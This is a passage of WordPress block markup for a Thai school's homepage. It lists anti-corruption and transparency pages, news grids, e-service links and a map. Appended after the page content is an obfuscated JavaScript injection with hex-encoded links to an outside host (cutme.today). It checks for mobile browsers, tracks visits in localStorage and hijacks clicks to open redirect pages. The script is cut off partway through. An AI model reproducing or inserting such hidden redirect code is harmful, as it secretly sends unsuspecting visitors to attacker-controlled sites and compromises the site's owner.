gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 